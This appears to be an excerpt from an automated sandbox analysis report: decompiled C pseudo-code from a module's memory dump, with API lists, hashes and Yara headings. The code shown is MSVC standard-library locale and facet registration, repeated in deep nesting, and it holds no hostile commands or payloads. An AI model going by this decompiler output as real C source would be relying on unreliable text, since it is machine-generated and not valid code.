																															_t931 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6E1C66BA(_t990 - 0x14);
																																return E6E1E0075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6E1D10BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t990 - 0x20);
																																		E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t699, _t931, _t954, 0x14);
																																		E6E1C6653(_t990 - 0x14, 0);
																																		_t955 =  *0x6e286df8;
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6E1A161C(0x6e286da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6E1C66BA(_t990 - 0x14);
																																			return E6E1E0075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6E1D1127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t990 - 0x20);
																																					E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t699, _t932, _t955, 0x14);
																																					E6E1C6653(_t990 - 0x14, 0);
																																					_t956 =  *0x6e286df4;
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6E1A161C(0x6e286da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6E1C66BA(_t990 - 0x14);
																																						return E6E1E0075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6E1D11AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t990 - 0x20);
																																								E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t699, _t933, _t956, 0x14);
																																								E6E1C6653(_t990 - 0x14, 0);
																																								_t957 =  *0x6e286dc8;
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6E1A161C(0x6e286d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6E1C66BA(_t990 - 0x14);
																																									return E6E1E0075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6E1D1230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t990 - 0x20);
																																											E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t699, _t934, _t957, 0x14);
																																											E6E1C6653(_t990 - 0x14, 0);
																																											_t958 =  *0x6e286dc4;
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6E1A161C(0x6e286d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6E1C66BA(_t990 - 0x14);
																																												return E6E1E0075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6E1D12B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t990 - 0x20);
																																														E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t699, _t935, _t958, 0x14);
																																														E6E1C6653(_t990 - 0x14, 0);
																																														_t959 =  *0x6e286dd8;
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6E1A161C(0x6e286d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6E1C66BA(_t990 - 0x14);
																																															return E6E1E0075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6E1D1339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t990 - 0x20);
																																																	E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t699, _t936, _t959, 0x14);
																																																	E6E1C6653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6e286db0;
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6E1A161C(0x6e286d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t990 - 0x14);
																																																		return E6E1E0075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6E1D13A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t990 - 0x20);
																																																				E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t699, _t937, _t960, 0x14);
																																																				E6E1C6653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6e286ddc;
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6E1A161C(0x6e286d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t990 - 0x14);
																																																					return E6E1E0075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6E1D1409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t990 - 0x20);
																																																							E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t699, _t938, _t961, 0x14);
																																																							E6E1C6653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6e286de0;
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6E1A161C(0x6e286d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
																																																							if(_t939 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t990 - 0x14);
																																																								return E6E1E0075(_t939);
																																																							} else {
																																																								__eflags = _t962;
																																																								if(_t962 == 0) {
																																																									_push( *((intOrPtr*)(_t990 + 8)));
																																																									_push(_t990 - 0x10);
																																																									__eflags = E6E1D1471(_t699, _t821, _t920, _t939, _t962) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t990 - 0x20);
																																																										E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t699, _t939, _t962, 0x14);
																																																										E6E1C6653(_t990 - 0x14, 0);
																																																										_t963 =  *0x6e286dfc;
																																																										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																										 *(_t990 - 0x10) = _t963;
																																																										_t555 = E6E1A161C(0x6e286da8);
																																																										_t828 =  *((intOrPtr*)(_t990 + 8));
																																																										_t940 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t555);
																																																										__eflags = _t940;
																																																										if(_t940 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t990 - 0x14);
																																																											return E6E1E0075(_t940);
																																																										} else {
																																																											__eflags = _t963;
																																																											if(_t963 == 0) {
																																																												_push( *((intOrPtr*)(_t990 + 8)));
																																																												_push(_t990 - 0x10);
																																																												__eflags = E6E1D14EC(_t699, _t828, _t920, _t940, _t963) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1A1438(_t990 - 0x20);
																																																													E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e2283cf, _t699, _t940, _t963, 0x14);
																																																													E6E1C6653(_t990 - 0x14, 0);
																																																													_t964 =  *0x6e286dcc;
																																																													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																													 *(_t990 - 0x10) = _t964;
																																																													_t568 = E6E1A161C(0x6e286d80);
																																																													_t835 =  *((intOrPtr*)(_t990 + 8));
																																																													_t941 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t568);
																																																													__eflags = _t941;
																																																													if(_t941 != 0) {
																																																														L138:
																																																														E6E1C66BA(_t990 - 0x14);
																																																														return E6E1E0075(_t941);
																																																													} else {
																																																														__eflags = _t964;
																																																														if(_t964 == 0) {
																																																															_push( *((intOrPtr*)(_t990 + 8)));
																																																															_push(_t990 - 0x10);
																																																															__eflags = E6E1D1558(_t699, _t835, _t920, _t941, _t964) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E1A1438(_t990 - 0x20);
																																																																E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																																asm("int3");
																																																																E6E1E00AC(0x6e2283cf, _t699, _t941, _t964, 0x14);
																																																																E6E1C6653(_t990 - 0x14, 0);
																																																																_t965 =  *0x6e286e00;
																																																																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																 *(_t990 - 0x10) = _t965;
																																																																_t581 = E6E1A161C(0x6e286dac);
																																																																_t842 =  *((intOrPtr*)(_t990 + 8));
																																																																_t942 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t581);
																																																																__eflags = _t942;
																																																																if(_t942 != 0) {
																																																																	L145:
																																																																	E6E1C66BA(_t990 - 0x14);
																																																																	return E6E1E0075(_t942);
																																																																} else {
																																																																	__eflags = _t965;
																																																																	if(_t965 == 0) {
																																																																		_push( *((intOrPtr*)(_t990 + 8)));
																																																																		_push(_t990 - 0x10);
																																																																		__eflags = E6E1D15C4(_t699, _t842, _t920, _t942, _t965) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6E1A1438(_t990 - 0x20);
																																																																			E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																																			asm("int3");
																																																																			E6E1E00AC(0x6e2283cf, _t699, _t942, _t965, 0x14);
																																																																			E6E1C6653(_t990 - 0x14, 0);
																																																																			_t966 =  *0x6e286dd0;
																																																																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																			 *(_t990 - 0x10) = _t966;
																																																																			_t594 = E6E1A161C(0x6e286d60);
																																																																			_t849 =  *((intOrPtr*)(_t990 + 8));
																																																																			_t943 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t594);
																																																																			__eflags = _t943;
																																																																			if(_t943 != 0) {
																																																																				L152:
																																																																				E6E1C66BA(_t990 - 0x14);
																																																																				return E6E1E0075(_t943);
																																																																			} else {
																																																																				__eflags = _t966;
																																																																				if(_t966 == 0) {
																																																																					_push( *((intOrPtr*)(_t990 + 8)));
																																																																					_push(_t990 - 0x10);
																																																																					__eflags = E6E1D162A(_t699, _t849, _t920, _t943, _t966) - 0xffffffff;
																																																																					if(__eflags == 0) {
																																																																						_t853 = _t990 - 0x20;
																																																																						E6E1A1438(_t853);
																																																																						E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																																						asm("int3");
																																																																						E6E1E00AC(0x6e22851f, _t699, _t943, _t966, 4);
																																																																						_t967 = _t853;
																																																																						 *(_t990 - 0x10) = _t967;
																																																																						 *((intOrPtr*)(_t967 + 4)) =  *((intOrPtr*)(_t990 + 0xc));
																																																																						_push( *((intOrPtr*)(_t990 + 0x14)));
																																																																						_t315 = _t990 - 4;
																																																																						 *_t315 =  *(_t990 - 4) & 0x00000000;
																																																																						__eflags =  *_t315;
																																																																						 *_t967 = 0x6e22c0c4;
																																																																						 *((char*)(_t967 + 0x28)) =  *((intOrPtr*)(_t990 + 0x10));
																																																																						E6E1D542F(_t699, _t853, _t920, _t943, _t967,  *_t315);
																																																																						return E6E1E0075(_t967,  *((intOrPtr*)(_t990 + 8)));
																																																																					} else {
																																																																						_t943 =  *(_t990 - 0x10);
																																																																						 *(_t990 - 0x10) = _t943;
																																																																						 *(_t990 - 4) = 1;
																																																																						E6E1C6FD3(__eflags, _t943);
																																																																						 *0x6e22a26c();
																																																																						 *((intOrPtr*)( *((intOrPtr*)( *_t943 + 4))))();
																																																																						 *0x6e286dd0 = _t943;
																																																																						goto L152;
																																																																					}
																																																																				} else {
																																																																					_t943 = _t966;
																																																																					goto L152;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			_t942 =  *(_t990 - 0x10);
																																																																			 *(_t990 - 0x10) = _t942;
																																																																			 *(_t990 - 4) = 1;
																																																																			E6E1C6FD3(__eflags, _t942);
																																																																			 *0x6e22a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t942 + 4))))();
																																																																			 *0x6e286e00 = _t942;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t942 = _t965;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t941 =  *(_t990 - 0x10);
																																																																 *(_t990 - 0x10) = _t941;
																																																																 *(_t990 - 4) = 1;
																																																																E6E1C6FD3(__eflags, _t941);
																																																																 *0x6e22a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t941 + 4))))();
																																																																 *0x6e286dcc = _t941;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t941 = _t964;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t940 =  *(_t990 - 0x10);
																																																													 *(_t990 - 0x10) = _t940;
																																																													 *(_t990 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t940);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t940 + 4))))();
																																																													 *0x6e286dfc = _t940;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t940 = _t963;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t939 =  *(_t990 - 0x10);
																																																										 *(_t990 - 0x10) = _t939;
																																																										 *(_t990 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t939);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t939 + 4))))();
																																																										 *0x6e286de0 = _t939;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t939 = _t962;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t938 =  *(_t990 - 0x10);
																																																							 *(_t990 - 0x10) = _t938;
																																																							 *(_t990 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t938);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t938 + 4))))();
																																																							 *0x6e286ddc = _t938;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t938 = _t961;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t937 =  *(_t990 - 0x10);
																																																				 *(_t990 - 0x10) = _t937;
																																																				 *(_t990 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t937);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t937 + 4))))();
																																																				 *0x6e286db0 = _t937;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t937 = _t960;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t936 =  *(_t990 - 0x10);
																																																	 *(_t990 - 0x10) = _t936;
																																																	 *(_t990 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t936);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t936 + 4))))();
																																																	 *0x6e286dd8 = _t936;
																																																	goto L103;
																																																}
																																															} else {
																																																_t936 = _t959;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t935 =  *(_t990 - 0x10);
																																														 *(_t990 - 0x10) = _t935;
																																														 *(_t990 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t935);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t935 + 4))))();
																																														 *0x6e286dc4 = _t935;
																																														goto L96;
																																													}
																																												} else {
																																													_t935 = _t958;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t934 =  *(_t990 - 0x10);
																																											 *(_t990 - 0x10) = _t934;
																																											 *(_t990 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t934);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t934 + 4))))();
																																											 *0x6e286dc8 = _t934;
																																											goto L89;
																																										}
																																									} else {
																																										_t934 = _t957;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t933 =  *(_t990 - 0x10);
																																								 *(_t990 - 0x10) = _t933;
																																								 *(_t990 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t933);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t933 + 4))))();
																																								 *0x6e286df4 = _t933;
																																								goto L82;
																																							}
																																						} else {
																																							_t933 = _t956;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t932 =  *(_t990 - 0x10);
																																					 *(_t990 - 0x10) = _t932;
																																					 *(_t990 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t932);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t932 + 4))))();
																																					 *0x6e286df8 = _t932;
																																					goto L75;
																																				}
																																			} else {
																																				_t932 = _t955;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t931 =  *(_t990 - 0x10);
																																		 *(_t990 - 0x10) = _t931;
																																		 *(_t990 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t931);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t931 + 4))))();
																																		 *0x6e286dc0 = _t931;
																																		goto L68;
																																	}
																																} else {
																																	_t931 = _t954;
																																	goto L68;
																																}
																															}
																														} else {
																															_t930 =  *(_t990 - 0x10);
																															 *(_t990 - 0x10) = _t930;
																															 *(_t990 - 4) = 1;
																															E6E1C6FD3(__eflags, _t930);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t930 + 4))))();
																															 *0x6e286df0 = _t930;
																															goto L61;
																														}
																													} else {
																														_t930 = _t953;
																														goto L61;
																													}
																												}
																											} else {
																												_t929 =  *(_t990 - 0x10);
																												 *(_t990 - 0x10) = _t929;
																												 *(_t990 - 4) = 1;
																												E6E1C6FD3(__eflags, _t929);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t929 + 4))))();
																												 *0x6e286dbc = _t929;
																												goto L54;
																											}
																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6E1C6FD3(__eflags, _t928);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6e286dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6E1C6FD3(__eflags, _t927);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6e286db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6E1C6FD3(__eflags, _t926);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6e286de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6E1C6FD3(__eflags, _t925);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6e286dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6E1C6FD3(__eflags, _t924);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6e286db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6E1C6FD3(__eflags, _t923);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6e286de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6E1C6FD3(__eflags, _t922);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6e286e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CEEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CEEFC
int.LIBCPMT ref: 6E1CEF13

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1CEF36
std::_Facet_Register.LIBCPMT ref: 6E1CEF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CEF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CEF8B

Strings

0k(n, xrefs: 6E1CEF07

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0k(n
API String ID: 2594415655-1656414601
Opcode ID: ae68a8a371e1269cae6d8ec00bc95850b5467bd2f73c4c3990b93b099d34a8ed
Instruction ID: aef53a23d998b24e4ae2cb3cfea3f7f9e8a4c4e67e5b70a9c63103f4c7b100a0
Opcode Fuzzy Hash: ae68a8a371e1269cae6d8ec00bc95850b5467bd2f73c4c3990b93b099d34a8ed
Instruction Fuzzy Hash: EA113675920519CBCF01EBE4C854AFEB77ABF64B14F140908E420E7290DF789E84EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t462 - 0x14, 0);
				_t441 =  *0x6e286dc8;
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1A161C(0x6e286d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E1C66BA(_t462 - 0x14);
					return E6E1E0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E1D1230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t462 - 0x20);
							E6E1E3D74(_t462 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t430, _t441, 0x14);
							E6E1C6653(_t462 - 0x14, 0);
							_t442 =  *0x6e286dc4;
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1A161C(0x6e286d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E1C66BA(_t462 - 0x14);
								return E6E1E0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E1D12B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t462 - 0x20);
										E6E1E3D74(_t462 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t327, _t431, _t442, 0x14);
										E6E1C6653(_t462 - 0x14, 0);
										_t443 =  *0x6e286dd8;
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1A161C(0x6e286d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E1C66BA(_t462 - 0x14);
											return E6E1E0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E1D1339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t462 - 0x20);
													E6E1E3D74(_t462 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t327, _t432, _t443, 0x14);
													E6E1C6653(_t462 - 0x14, 0);
													_t444 =  *0x6e286db0;
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1A161C(0x6e286d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E1C66BA(_t462 - 0x14);
														return E6E1E0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E1D13A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t462 - 0x20);
																E6E1E3D74(_t462 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t327, _t433, _t444, 0x14);
																E6E1C6653(_t462 - 0x14, 0);
